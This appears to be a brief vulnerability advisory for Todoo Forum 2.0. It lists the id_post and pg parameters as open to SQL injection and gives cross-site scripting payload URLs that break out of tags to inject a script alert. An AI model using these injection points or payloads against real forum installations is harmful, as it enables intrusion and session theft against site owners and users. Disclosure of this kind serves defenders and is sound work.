Todoo Forum version 2.0 suffers from remote SQL injection and cross site scripting vulnerabilities.
a11346eea696bb6663bfb860910f35574ec0f7b413d886b7e815a47c0c3bc4d3
[+] SQL Injection
[+] Parameter : id_post
[+] http://localhost/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=[Inject_here]&pg=1
[+] Parameter : pg
[+] http://localhost/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=1&pg=[Inject_Here]
[+] Cross-site scripting
[+] Parameter : id_post
[+] http://localhost/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post='"--></style></script><script>alert(0x0000)</script>&pg=1
[+] Parameter : pg
[+] http://localhost/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=2&pg='"--></style></script><script>alert(0x0000)</script>